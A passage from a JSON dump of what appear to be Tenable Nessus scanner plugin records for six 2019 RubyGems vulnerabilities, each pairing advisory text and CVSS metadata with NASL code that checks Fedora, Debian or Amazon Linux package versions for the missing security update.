"cvss3": {"score": 7.4, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H"}, "published": "2019-05-10T00:00:00", "title": "Fedora 28 : ruby (2019-feac6674b7)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-8320", "CVE-2019-8325", "CVE-2019-8321", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:ruby", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2019-FEAC6674B7.NASL", "href": "https://www.tenable.com/plugins/nessus/124728", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-feac6674b7.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124728);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2020/01/21\");\n\n script_cve_id(\"CVE-2019-8320\", \"CVE-2019-8321\", \"CVE-2019-8322\", \"CVE-2019-8323\", \"CVE-2019-8324\", \"CVE-2019-8325\");\n script_xref(name:\"FEDORA\", value:\"2019-feac6674b7\");\n\n script_name(english:\"Fedora 28 : ruby (2019-feac6674b7)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Rebase to latest minor version fixes CVE-2019-8320 CVE-2019-8321\nCVE-2019-8322 CVE-2019-8323 CVE-2019-8324 CVE-2019-8325\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-feac6674b7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8320\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"ruby-2.5.5-108.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2021-01-01T01:50:26", "description": "Several vulnerabilities have been discovered in the Rubygems included\nin the interpreter for the Ruby language, which may result in denial\nof service or the execution of arbitrary code.", "edition": 17, "cvss3": {"score": 7.4, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H"}, "published": "2019-04-17T00:00:00", "title": "Debian DSA-4433-1 : ruby2.3 - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-8320", "CVE-2019-8325", "CVE-2019-8321", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:ruby2.3", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4433.NASL", "href": "https://www.tenable.com/plugins/nessus/124096", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4433. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124096);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2020/01/23\");\n\n script_cve_id(\"CVE-2019-8320\", \"CVE-2019-8321\", \"CVE-2019-8322\", \"CVE-2019-8323\", \"CVE-2019-8324\", \"CVE-2019-8325\");\n script_xref(name:\"DSA\", value:\"4433\");\n\n script_name(english:\"Debian DSA-4433-1 : ruby2.3 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the Rubygems included\nin the interpreter for the Ruby language, which may result in denial\nof service or the execution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/ruby2.3\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/ruby2.3\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2019/dsa-4433\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the ruby2.3 packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 2.3.3-1+deb9u6.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8320\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"libruby2.3\", reference:\"2.3.3-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby2.3\", reference:\"2.3.3-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby2.3-dev\", reference:\"2.3.3-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby2.3-doc\", reference:\"2.3.3-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby2.3-tcltk\", reference:\"2.3.3-1+deb9u6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2021-01-01T01:20:21", "description": "An issue was discovered in RubyGems. The gem owner command outputs the\ncontents of the API response directly to stdout. Therefore, if the\nresponse is crafted, escape sequence injection may\noccur.(CVE-2019-8322)\n\nAn issue was discovered in RubyGems.\nGem::GemcutterUtilities#with_response may output the API response to\nstdout as it is. Therefore, if the API side modifies the response,\nescape sequence injection may occur.(CVE-2019-8323)\n\nAn issue was discovered in RubyGems. Since\nGem::UserInteraction#verbose calls say without escaping, escape\nsequence injection is possible.(CVE-2019-8321)\n\nA Directory Traversal issue was discovered in RubyGems. Before making\nnew directories or touching files (which now include path-checking\ncode for symlinks), it would delete the target destination. If that\ndestination was hidden behind a symlink, a malicious gem could delete\narbitrary files on the user's machine, presuming the attacker could\nguess at paths. Given how frequently gem is run as sudo, and how\npredictable paths are on modern systems (/tmp, /usr, etc.), this could\nlikely lead to data loss or an unusable system.(CVE-2019-8320)\n\nAn issue was discovered in RubyGems. A crafted gem with a multi-line\nname is not handled correctly. Therefore, an attacker could inject\narbitrary code to the stub line of gemspec, which is eval-ed by code\nin ensure_loadable_spec during the preinstall check.(CVE-2019-8324)\n\nAn issue was discovered in RubyGems. Since Gem::CommandManager#run\ncalls alert_error without escaping, escape sequence injection is\npossible. (There are many ways to cause an error.)(CVE-2019-8325)", "edition": 18, "cvss3": {"score": 7.4, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H"}, "published": "2019-08-13T00:00:00", "title": "Amazon Linux AMI : ruby20 / ruby21,ruby24 (ALAS-2019-1255)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-8320", "CVE-2019-8325", "CVE-2019-8321", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:rubygem20-psych", "p-cpe:/a:amazon:linux:ruby21-irb", "p-cpe:/a:amazon:linux:ruby20-devel", "p-cpe:/a:amazon:linux:ruby20-debuginfo", "p-cpe:/a:amazon:linux:rubygem20-bigdecimal", "p-cpe:/a:amazon:linux:ruby20-doc", "p-cpe:/a:amazon:linux:rubygem20-io-console", "p-cpe:/a:amazon:linux:rubygem24-xmlrpc", "p-cpe:/a:amazon:linux:ruby20", "p-cpe:/a:amazon:linux:ruby24", "p-cpe:/a:amazon:linux:ruby24-doc", "p-cpe:/a:amazon:linux:ruby24-irb", "p-cpe:/a:amazon:linux:rubygem24-did_you_mean", "p-cpe:/a:amazon:linux:ruby24-debuginfo", "p-cpe:/a:amazon:linux:ruby20-libs", "p-cpe:/a:amazon:linux:rubygem21-bigdecimal", "p-cpe:/a:amazon:linux:rubygem24-io-console", "p-cpe:/a:amazon:linux:rubygems21", "p-cpe:/a:amazon:linux:ruby21-devel", "p-cpe:/a:amazon:linux:ruby21", "p-cpe:/a:amazon:linux:rubygem21-io-console", "p-cpe:/a:amazon:linux:ruby21-libs", "p-cpe:/a:amazon:linux:ruby24-devel", "p-cpe:/a:amazon:linux:rubygems24", "p-cpe:/a:amazon:linux:rubygem21-psych", "p-cpe:/a:amazon:linux:rubygems20", "p-cpe:/a:amazon:linux:ruby21-doc", "p-cpe:/a:amazon:linux:ruby20-irb", "p-cpe:/a:amazon:linux:rubygems24-devel", "p-cpe:/a:amazon:linux:rubygems21-devel", "p-cpe:/a:amazon:linux:rubygem24-psych", "p-cpe:/a:amazon:linux:rubygems20-devel", "p-cpe:/a:amazon:linux:rubygem24-bigdecimal", "p-cpe:/a:amazon:linux:rubygem24-json", "p-cpe:/a:amazon:linux:ruby24-libs", "cpe:/o:amazon:linux", "p-cpe:/a:amazon:linux:ruby21-debuginfo"], "id": "ALA_ALAS-2019-1255.NASL", "href": "https://www.tenable.com/plugins/nessus/127811", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2019-1255.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(127811);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2020/01/02\");\n\n script_cve_id(\"CVE-2019-8320\", \"CVE-2019-8321\", \"CVE-2019-8322\", \"CVE-2019-8323\", \"CVE-2019-8324\", \"CVE-2019-8325\");\n script_xref(name:\"ALAS\", value:\"2019-1255\");\n\n script_name(english:\"Amazon Linux AMI : ruby20 / ruby21,ruby24 (ALAS-2019-1255)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An issue was discovered in RubyGems. The gem owner command outputs the\ncontents of the API response directly to stdout. Therefore, if the\nresponse is crafted, escape sequence injection may\noccur.(CVE-2019-8322)\n\nAn issue was discovered in RubyGems.\nGem::GemcutterUtilities#with_response may output the API response to\nstdout as it is. Therefore, if the API side modifies the response,\nescape sequence injection may occur.(CVE-2019-8323)\n\nAn issue was discovered in RubyGems. Since\nGem::UserInteraction#verbose calls say without escaping, escape\nsequence injection is possible.(CVE-2019-8321)\n\nA Directory Traversal issue was discovered in RubyGems. Before making\nnew directories or touching files (which now include path-checking\ncode for symlinks), it would delete the target destination. If that\ndestination was hidden behind a symlink, a malicious gem could delete\narbitrary files on the user's machine, presuming the attacker could\nguess at paths. Given how frequently gem is run as sudo, and how\npredictable paths are on modern systems (/tmp, /usr, etc.), this could\nlikely lead to data loss or an unusable system.(CVE-2019-8320)\n\nAn issue was discovered in RubyGems. A crafted gem with a multi-line\nname is not handled correctly. Therefore, an attacker could inject\narbitrary code to the stub line of gemspec, which is eval-ed by code\nin ensure_loadable_spec during the preinstall check.(CVE-2019-8324)\n\nAn issue was discovered in RubyGems. Since Gem::CommandManager#run\ncalls alert_error without escaping, escape sequence injection is\npossible. (There are many ways to cause an error.)(CVE-2019-8325)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2019-1255.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum update ruby20' to update your system.\n\nRun 'yum update ruby21' to update your system.\n\nRun 'yum update ruby24' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8320\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby20\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby20-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby20-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby20-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby20-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby20-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby21\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby21-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby21-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby21-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby21-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby21-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby24\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby24-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby24-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby24-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby24-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby24-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem20-bigdecimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem20-io-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem20-psych\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem21-bigdecimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem21-io-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem21-psych\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem24-bigdecimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem24-did_you_mean\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem24-io-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem24-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem24-psych\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem24-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems20\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems20-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems21\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems21-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems24\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems24-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"ruby20-2.0.0.648-1.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby20-debuginfo-2.0.0.648-1.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby20-devel-2.0.0.648-1.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby20-doc-2.0.0.648-1.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby20-irb-2.0.0.648-1.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby20-libs-2.0.0.648-1.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby21-2.1.9-1.22.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby21-debuginfo-2.1.9-1.22.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby21-devel-2.1.9-1.22.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby21-doc-2.1.9-1.22.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby21-irb-2.1.9-1.22.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby21-libs-2.1.9-1.22.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby24-2.4.5-1.30.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby24-debuginfo-2.4.5-1.30.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby24-devel-2.4.5-1.30.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby24-doc-2.4.5-1.30.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby24-irb-2.4.5-1.30.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby24-libs-2.4.5-1.30.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem20-bigdecimal-1.2.0-1.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem20-io-console-0.4.2-1.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem20-psych-2.0.0-1.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem21-bigdecimal-1.2.4-1.22.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem21-io-console-0.4.3-1.22.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem21-psych-2.0.5-1.22.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem24-bigdecimal-1.3.2-1.30.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem24-did_you_mean-1.1.0-1.30.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem24-io-console-0.4.6-1.30.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem24-json-2.0.4-1.30.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem24-psych-2.2.2-1.30.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem24-xmlrpc-0.2.1-1.30.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems20-2.0.14.1-1.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems20-devel-2.0.14.1-1.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems21-2.2.5-1.22.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems21-devel-2.2.5-1.22.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems24-2.6.14.3-1.30.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems24-devel-2.6.14.3-1.30.11.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby20 / ruby20-debuginfo / ruby20-devel / ruby20-doc / ruby20-irb / etc\");\n}\n", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2021-01-01T02:26:46", "description": "Rebase to latest minor version fixes CVE-2019-8320 CVE-2019-8321\nCVE-2019-8322 CVE-2019-8323 CVE-2019-8324 CVE-2019-8325\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 17, "cvss3": {"score": 7.4, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H"}, "published": "2019-05-03T00:00:00", "title": "Fedora 29 : ruby (2019-a155364f3c)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-8320", "CVE-2019-8325", "CVE-2019-8321", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:29", "p-cpe:/a:fedoraproject:fedora:ruby"], "id": "FEDORA_2019-A155364F3C.NASL", "href": "https://www.tenable.com/plugins/nessus/124574", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-a155364f3c.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124574);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2020/01/21\");\n\n script_cve_id(\"CVE-2019-8320\", \"CVE-2019-8321\", \"CVE-2019-8322\", \"CVE-2019-8323\", \"CVE-2019-8324\", \"CVE-2019-8325\");\n script_xref(name:\"FEDORA\", value:\"2019-a155364f3c\");\n\n script_name(english:\"Fedora 29 : ruby (2019-a155364f3c)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Rebase to latest minor version fixes CVE-2019-8320 CVE-2019-8321\nCVE-2019-8322 CVE-2019-8323 CVE-2019-8324 CVE-2019-8325\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-a155364f3c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8320\");\n 